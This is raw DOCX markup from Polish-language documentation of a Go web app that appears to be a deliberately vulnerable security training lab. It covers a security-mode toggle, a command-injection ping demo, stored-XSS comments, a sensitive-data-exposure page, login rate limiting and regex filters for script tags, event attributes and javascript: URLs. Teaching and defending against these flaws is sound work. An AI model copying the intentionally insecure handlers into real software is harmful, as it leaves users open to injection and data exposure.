        <w:t>Listing 85. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208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110" w:name="sec110"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.76. *Handler.PageCmdInjection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11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internal/handlers/handlers.go:1502</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PageCmdInjection renders the Command Injection demo page. When a host query parameter is present it runs the ping and shows the output.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PageCmdInjection renders the Command Injection demo page.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When a host query parameter is present it runs the ping and shows the output.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PageCmdInjection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HandlerFunc</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2086" w:name="lst86"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 86. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208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gin.HandlerFunc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zwraca handler Gin; właściwe wejście runtime pochodzi z </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*gin.Context</w:t>
      </w:r>
      <w:r>
        <w:t>, parametrów URL, formularza, JSON body lub cookies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="111" w:name="sec111"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. internal/security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pliki:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/security/mode.go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="112" w:name="sec112"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.1. Typy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="113" w:name="sec113"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.2. ModeStore</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> struct</w:t>
      </w:r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internal/security/mode.go:6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ModeStore keeps the lab security mode in one concurrency-safe place.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pola/wejścia struktury:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>enabled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>atomic.Bool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - pole danych struktury.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="114" w:name="sec114"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.3. Funkcje i metody</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="115" w:name="sec115"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.4. NewModeStore</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115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internal/security/mode.go:10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NewModeStore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initial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ModeStore</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2087" w:name="lst87"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 87. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208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initial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*ModeStore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16" w:name="sec116"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.5. *ModeStore.Enabled</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116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internal/security/mode.go:16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ModeStore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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2088" w:name="lst88"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 88. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208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17" w:name="sec117"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.6. *ModeStore.Set</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117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internal/security/mode.go:23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ModeStore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89" w:name="lst89"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 89. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208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18" w:name="sec118"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>7.7. *ModeStore.Toggle</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118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internal/security/mode.go:30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ModeStore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Toggle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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2090" w:name="lst90"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 90. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209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19" w:name="sec119"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8. internal/service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pliki:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/service/service.go</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="120" w:name="sec120"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.1. Typy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="121" w:name="sec121"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.2. Comment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> struct</w:t>
      </w:r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internal/service/service.go:41</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Comment is a blog comment (may contain raw HTML in insecure mode for the Stored XSS demo).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pola/wejścia struktury:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>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PostID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Author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Body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CreatedAt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bookmarkStart w:id="122" w:name="sec122"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.3. Post</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> struct</w:t>
      </w:r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internal/service/service.go:58</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> typ Post przechowuje dane używane przez pakiet internal/service _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pola/wejścia struktury:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>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Title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PostContent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Published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Author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AttachmentPath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AttachmentName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bookmarkStart w:id="123" w:name="sec123"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.4. Service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> struct</w:t>
      </w:r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internal/service/service.go:33</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> typ Service przechowuje dane używane przez pakiet internal/service _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pola/wejścia struktury:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*sql.DB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mode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*security.ModeStore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rl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*rateLimiter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - pole danych struktury.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="124" w:name="sec124"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.5. UserRecord</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> struct</w:t>
      </w:r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internal/service/service.go:50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UserRecord exposes user rows for the Sensitive Data Exposure demo page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pola/wejścia struktury:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>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PasswordHash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Email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Role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bookmarkStart w:id="125" w:name="sec125"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.6. loginRecord</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> struct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internal/service/service.go:17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> loginRecord tracks failed login attempts for a username (used in secure mode to enforce a rate limit and slow down brute-force attacks).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pola/wejścia struktury:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>failures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resetAt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>time.Time</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - pole danych struktury.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="126" w:name="sec126"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.7. rateLimiter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> struct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internal/service/service.go:24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rateLimiter is a simple in-memory store; each service instance keeps its own so that tests remain isolated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pola/wejścia struktury:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>mu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sync.Mutex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records</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>map[string]*loginRecord</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - pole danych struktury.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="127" w:name="sec127"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.8. Stałe i zmienne</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="128" w:name="sec128"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.9. eventAttributeRE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> var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internal/service/service.go:70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regexp.MustCompile(</w:t>
      </w:r>
      <w:r>
        <w:t>(?i)\s+on[a-z0-9_-]+\s*=\s*("[^"]*"|'[^']*'|[^\s&gt;]+)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)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internal/service _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="129" w:name="sec129"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.10. javascriptSchemeRE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> var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internal/service/service.go:71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regexp.MustCompile(</w:t>
      </w:r>
      <w:r>
        <w:t>(?i)javascript\s*:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)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internal/service _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="130" w:name="sec130"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.11. lockoutSeconds</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130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internal/service/service.go:500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60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internal/service _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="131" w:name="sec131"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.12. maxFailures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131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internal/service/service.go:499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5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internal/service _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="132" w:name="sec132"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.13. scriptTagRE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Rodzaj:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> var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internal/service/service.go:69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regexp.MustCompile(</w:t>
      </w:r>
      <w:r>
        <w:t>(?i)&lt;/?\s*script[^&gt;]*&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>)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internal/service _(opis wygenerowany, brak komentarza GoDoc w kodzie)._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="133" w:name="sec133"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.14. Funkcje i metody</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="134" w:name="sec134"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.15. newRateLimiter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134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internal/service/service.go:29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newRateLimiter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rateLimiter</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2091" w:name="lst91"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 91. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209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*rateLimiter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35" w:name="sec135"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.16. New</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135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internal/service/service.go:74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New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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2092" w:name="lst92"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 92. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209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db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*sql.DB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securityEnabled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*Service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36" w:name="sec136"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.17. NewWithMode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136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internal/service/service.go:78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NewWithMode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mode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security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ModeStore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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2093" w:name="lst93"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 93. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209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db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*sql.DB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mode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*security.ModeStore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*Service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37" w:name="sec137"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.18. *Service.SecurityEnabled</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137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internal/service/service.go:82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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2094" w:name="lst94"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 94. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209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38" w:name="sec138"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.19. *Service.SetSecurityEnabled</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138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internal/service/service.go:86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SetSecurityEnabled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95" w:name="lst95"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 95. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209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39" w:name="sec139"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.20. *Service.GetPublishedPosts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139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internal/service/service.go:90</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> funkcja/metoda odczytująca dane z bazy albo warstwy serwisowej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GetPublishedPosts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Post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96" w:name="lst96"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
